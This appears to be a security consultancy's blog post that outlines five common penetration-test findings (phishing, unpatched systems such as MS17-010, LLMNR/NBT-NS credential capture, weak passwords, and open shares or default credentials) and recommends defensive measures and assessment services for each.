When clients need to take steps to secure their environment, the myriad of systems, tools, processes, and procedures that could be implemented or enhanced can be overwhelming. Many organizations need a well-defined starting point before undertaking any new information security-related initiatives. 

 

As a result of our experience in penetration testing, addressing the five common findings outlined below have been found to close a significant number of technical gaps that can be used by attackers to compromise your systems and users.

 

 

It’s been said before, and it will be said again – social engineering is the number one way that penetration testers (and real hackers) gain initial access to corporate environments. In general, this takes the form of unsolicited emails that contain malicious links meant to send users to password-harvesting webpages, or malicious downloads containing malware. From a technical perspective, every organization should implement robust email security controls, including spam filtering, validation of links contained in emails, and automated security scans of attachments. This approach, however, is a losing battle, as attackers are constantly finding ways around these mitigations, resulting in those malicious emails ending up in your user’s inbox. Therefore, there is absolutely no replacement for formal awareness training around social engineering. The best approach here is to actually simulate phishing attacks, to train users during their day-to-day activities on how to identify phishing emails. DGC recommends a simulated phishing exercise and formal awareness training services to help organizations close this open front door for attackers.

 

 

Once the DGC team has breached the perimeter via social engineering or other attack vector, the next piece of “low hanging fruit” is often related to out-of-date operating systems on the internal network. Over the past few years, there have been a number of high-profile vulnerabilities which are often leveraged by pentesters (and real hackers) to breach individual information systems. These types of vulnerabilities, the ones you hear about on the news, are useful because very reliable exploit code is generally available to take advantage of them. This means that any attacker, sophisticated or not, can use these vulnerabilities to gain unauthorized access to unpatched systems. When we see even a single instance of a vulnerability like MS17-010, the Microsoft Windows vulnerability that led to the world-wide WannaCry ransomware outbreak in 2017, we know we’ve got an easy initial vector for exploitation, and a foothold on a system from which to stage further attacks. Robust patching processes are a must to prevent these types of vulnerabilities from introducing risk into an organization, along with independent validation via periodic vulnerability scans. Vulnerability assessment services provide organizations with a baseline of vulnerability information across their entire network.

 

 

Even on networks where administrators have implemented robust patching processes, and all systems are up to date, there are usually still some simple attack vectors available to penetration testers and hackers alike. For example, there are some standard mechanisms by which attackers can recover user credentials just by listening in on the network. These techniques rely on the fact that most organizations have not disabled a suite of old (and often not required) protocols used for name resolution on an internal network. These older protocols, namely Link Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service are (NBT-NS) are insecure and can be “tricked” into sending user traffic to an attacker’s system. This traffic may contain representations of the user’s password. Once this has been obtained, it can be “cracked” to obtain the user’s actual password. While many security firms that offer vulnerability assessment services simply run a scan, it is critical that they also review these additional common attack vectors and provide recommendations to close any identified gaps. 

 

 

In the situation outlined above, the attacker usually still needs to “crack” an encrypted password in order to be able to leverage the stolen credentials. And even when these encrypted credentials can’t be recovered by listening in on the internal network, sometimes gaining access to a system is as simple as “guessing” a password. Whether the penetration tester (or hacker) needs to “crack” a stolen password or guess a password by trying to authenticate directly to a system, the only real protection available at this point is the strength of those passwords. Password length and complexity are the two main drivers which prevent a malicious user from recovering or guessing passwords within your environment. Short passwords, or passwords based on dictionary words are easily “cracked” and easily guessed. An organization that has implemented a strong password policy, including a minimum password length of at least 10 characters, along with training for employees on how to select strong passwords, is much better prepared to defend their network against these basic password attacks. All vulnerability assessments should include a review of the internal password policies, whether written or technically enforced via a tool like Active Directory.

 

 

When all else fails, sometimes it’s easiest just to poke around the network and look for data people have left just “lying around”. In these cases, attackers might get lucky and find a network share that doesn’t require authentication, leaving the data stored therein susceptible to unauthorized disclosure. Alternatively, while an organization may have secured their business applications with user passwords, they may have left the “back door” (i.e. direct database access) open to any user or secured with a default password. To an attacker, it doesn’t matter how we get to the data, whether it’s by logging into the front end, or accessing the database on the backend. Both mechanisms result in the same exposure. An organization that does not undertake regular assessments is vulnerable to these types of issues because as the network grows and changes, new vulnerabilities and misconfigurations are likely to be introduced. During a vulnerability assessment or penetration test, the network should be reviewed for open shares and default credentials, to ensure the organization isn’t handing sensitive data over on a silver platter.  

 

All organizations must take steps to secure their information system assets. The amount of time and money that can be dedicated to the pursuit of information security is highly dependent on the size and maturity of the organization. 

 

But what nearly every organization has in common is susceptibility to standard hacking tools, techniques, and procedures. Small and large organizations alike rely on technology to support critical business processes. Taking these relatively simple steps to close common attack vectors can have a profound impact on the true risk exposure to an organization.

 

During penetration testing assessments the DGC team regularly leverages the same techniques over and over to steal credentials, gain access to organizational systems, move laterally, and escalate privileges. By addressing these top 5 attack vectors, your organization will be better protected against penetration testers and hackers alike.